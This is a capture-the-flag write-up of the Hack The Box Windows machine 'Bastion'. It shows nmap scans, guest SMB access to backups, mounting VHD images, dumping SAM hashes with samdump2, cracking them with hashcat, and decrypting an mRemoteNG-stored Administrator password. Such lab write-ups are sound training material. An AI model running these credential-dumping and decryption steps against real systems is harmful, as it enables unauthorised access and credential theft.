Hack The Box Write Up - Bastion

Hacker Orientation

Bastion was technically my second box on HTB, but it truly felt like my first.

OS:	Windows
Difficulty:	Easy
Points:	20
Release: 27 Apr 2019
IP:	10.10.10.134

Bastion was already pretty old by the time I started working on it, so the pressure to get root before it was retired kept me going 😈

I don’t have much of a background in Windows sysadmin work, but I was up for the challenge!

nmap:

# Nmap 7.80 scan initiated Fri Aug 30 17:38:43 2019 as: nmap -sV -o nmap_sv.out 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 30 17:38:52 2019 -- 1 IP address (1 host up) scanned in 8.63 seconds

Breaking it down

22 and 445 were the only ports I knew off the top of my head, and my SMB game was pretty weak.

Before even thinking about MSF and searchsploit, let’s kick off another scan, but with the default script flag.

This yielded some usable information about 445!

| account_used: guest

🤔

# Nmap 7.70 scan initiated Fri Aug 23 19:59:31 2019 as: nmap -sC -o nmap_sc.out 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.089s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_clock-skew: mean: -39m24s, deviation: 1h09m15s, median: 33s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-24T03:00:11+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-08-23 20:00:12
|_  start_date: 2019-08-23 18:03:12

# Nmap done at Fri Aug 23 19:59:44 2019 -- 1 IP address (1 host up) scanned in 12.98 seconds

So what do we do with that?

Hohoho, we can get to a few shares!

smbclient -L 10.10.10.134

Let’s connect!

smbclient -U guest //10.10.10.134/Backups
cd WindowsImageBackup\L4mpje-PC\Backup~1\
dir

What are these .vhd files..?

They are apparently Virtual Hard Disks. Maybe they have some credentials we can use. But how are we going to view what’s inside?

According to the note in the directory, we shouldn’t even try to copy these .vhd files. The bandwidth just isn’t there.

Can we mount them? YES WE CAN!

mkdir /mnt/win /mnt/vhd3 /mnt/vhd4

mount -t cifs //10.10.10.134/Backups /mnt/win -o rw

guestmount --add /mnt/win/WindowsImageBackup/L4mpje-PC/Backup*/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd3 -v

guestmount --add /mnt/win/WindowsImageBackup/L4mpje-PC/Backup*/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd4 -v

They’re mounted. Now what?

Because of my inexperience with Windows syadmin work, I had no idea what to do!

Googling around for Windows equivalents of /etc/passwd and /etc/shadow led me to C:\Windows\System32\config and a nifty tool called samdump2.

cd /mnt/vhd4/Windows/System32/config
samdump2 SYSTEM SAM > /root/hash.txt

Let’s get crackin’!

I’d like to note that I burned more time trying to figure out password cracking. See the ‘Snags’ section below for details around my lessons learned for around this.

After a lot of frustration and an equal amount of coffee, I started looking for online cracking tools. People out there have probably cracked this, and it should be a simple lookup in their database.

End of the day, we got the password right? 😅

🚨 DANGER 🚨  
There are dangers to doing this with real credentials.  Sending hashes to random websites means that the website now has that credential.

I do not recommend the use of online cracking tools for credentials that have even the slightest possibility of being used on a real system.  
🚨 DANGER 🚨

Finally time for a shell! User flag isn’t far.

Use those creds to SSH as L4mpje, and we’re greeted with a Windows prompt!

Let’s get the user flag: type Desktop\user.txt

Moving onto root

So do I go back to C:\Windows\System32\config now that we’re on a live system? Definitely did, but was definitely blocked due to permissions.

Now what? I do know where games are installed, thanks to PC gaming!
Program Files 😎

Poking around there, I saw an interesting program.. mRemoteNG. Research shows that it’s for remote desktop.

It doesn’t have a good reputation in the security world, and that sounds great from the offensive side. 😈

I wonder if there’s a metasploit module or exploit-db script I can use!

Finding the config

Configs live in /etc/, right? Oh wait, Windows. 🤦‍

Turns out they sometimes live in C:\Users\L4mpje\AppData\Roaming\

After reading the matrix and going crosseyed after reading tons of config files, I stumbled upon one that looked promising: ` C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml`

This yielded an Administrator password, but in a strange format..

<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Userna
me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
 Hostname="127.0.0.1" Protocol="RDP" 

Taking time to recall

Remember how mRemoteNG was not highly regarded in the security realm?

That probably means people have written tools to help with exploitation.

It turns out that haseebT made a script to decrypt that string!

python3 mremotedecrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

We’ve got an Administrator credential!

Last thing to do is SSH in and get that root flag: type Desktop\root.txt

Before concluding this writeup, what snags did I run into?

I had to install stuff on Kali for mounting

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
apt update
apt install libguestfs-tools
apt install cifs-utils

Cracking woes

After rooting, I couldn’t help but feel unfulfilled knowing that I didn’t crack the password on my own.

Here’s how to crack it locally: hashcat -m1000 --force hash.txt /usr/share/wordlists/rockyou.txt

Lesson learned: the mode of what you’re trying to crack is pretty important! Both for speed and accuracy. Also helps with sanity 😅

Closing thoughts

As I mentioned at the top, Bastion truly felt like my first box.

I leaned on the forums for a few hints here and there, but this box forced me to learn a bunch about SMB and Windows.

Hats off to L4mpje for creating this excellent box!